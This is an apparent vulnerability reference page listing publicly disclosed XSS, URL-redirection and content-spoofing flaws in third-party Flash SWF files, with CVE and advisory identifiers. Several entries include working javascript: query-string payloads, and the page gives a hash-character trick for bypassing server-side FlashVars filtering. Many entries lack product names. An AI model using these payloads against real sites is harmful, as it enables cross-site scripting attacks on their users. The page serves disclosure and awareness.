Flash Exploitation Database

This database consists of publically reported Flash web application vulnerabilities and remediation when available. The purpose of this document is to serve as a quick reference of Flash related web vulnerabilities and raise awarness for better Actionscript coding practices. All vulnerabilities are due to vendor code and not directly related to the Adobe Flash plug-in.

Server-side filtering of FlashVars can be bypassed by including a hash character before the query string, thereby forcing the injection to only be interpreted by the client's browser. (#?var=val)

Macromedia

Affected Version:		Unknown
Vuln. Class:		URL Redirection & XSS
CVE:		CVE-2003-0208
Bugtraq:		105033712615013

/[Banner Name].swf

?clickTag=javascript:confirm('Your cookies and authentication have been captured and an attacker now owns your account and all your information.');&.swf

Macromedia Flash Detection Kit

Affected Version:		Flash MX 2004
Vuln. Class:		URL Redirection & XSS

/flash_detection.swf

?flashContentURL=javascript:confirm('Your cookies and authentication have been captured and an attacker now owns your account and all your information.')&altContentURL=http://www.google.com&.swf

sIFR2

Affected Version:		2.0.2
Vuln. Class:		Content Spoofing & XSS
Remediation:		Upgrade to Current Version
CVE:		CVE-2008-0438
BID:		27394
SReason:		3571

[Font Name].swf

?txt=<a href="javascript:confirm('Your cookies and authentication have been captured by an attacker.')">XSS!</a>&.swf

Affected Version:		r436
Vuln. Class:		Content Spoofing & XSS
Remediation:		Upgrade to Current Version
CVE:		CVE-2011-3641

Affected Version:		7.1.1 *Current (Optional Patch)
Vuln. Class:		Content Spoofing & XSS
Remediation:		Apply Optional Patch Provided by Vendor
Vendor Advisory:		Security Bulletin 5
OSVDB:		68791

Affected Version:		1.13 - 3.2.8
Vuln. Class:		Content Spoofing & XSS
OSVDB:		73803
XFDB:		68526

Affected Version:		3.1.0 - 4
Vuln. Class:		Content Spoofing & XSS
CVE:		CVE-2011-3642

Affected Version:		5 - 5.4.1
Vuln. Class:		Content Spoofing & XSS

Affected Version:		1.6.0
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Original Disclosure:		[FULL DISCLOSURE]
XFDB:		69384
OSVDB:		74922
SA:		SA45692
CVE:		CVE-2011-3644

Affected Version:		?-5.8
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Vendor Disclosure:		Trac
Vendor Disclsoure 2:		Trac
XFDB:		67982
BID:		48214
SA:		SA44850
CVE:		CVE-2011-2413

Affected Version:		5.9-5.10
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Vendor Trac Ticket:		Trac

Affected Version:		2.6.3
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Remediation:		Domain restricted version available by contacting vendor
CVE:		CVE-2012-1302

Affected Version:		Flash v1
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Remediation:		Domain restricted version available by contacting vendor
CVE:		CVE-2012-1303

Affected Version:		3.0.4, issue resolved in 3.0.5 however remains vulnerable in 3.2
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Vendor Disclosure:		Version History (3.0.5)
CVE:		CVE-2008-6060
Cisco:		18124
XFDB:		48577
Affected Files:		Charts / Widgets / Maps

Affected Version:		2.2.0.1
Vuln. Class:		XSS
Disclosure:		Neal Poole Blog
CVE:		CVE-2012-2399

Affected Version:		1.21
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Remediation:		Upgrade to Current Version
Vendor Advisory:		Security Update
CVE:		CVE-2009-4169
BID:		37102

Affected Version:		1.22
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
Remediation:		Upgrade to Current Version
CVE:		CVE-2009-4168
BID:		37100
Original Disclosure:		[FULL DISCLOSURE]
Vendor Advisory:		Security Update

Affected Version:		6.0.7
Vuln. Class:		Content Spoofing, URL Redirection, & XSS
CVE:		CVE-2012-1505

Affected Version:		2.1.1
Vuln. Class:		Content Spoofing & XSS
CVE:		CVE-2012-2228
Resolution:		2.1.2

Exploits

Flash Exploitation Database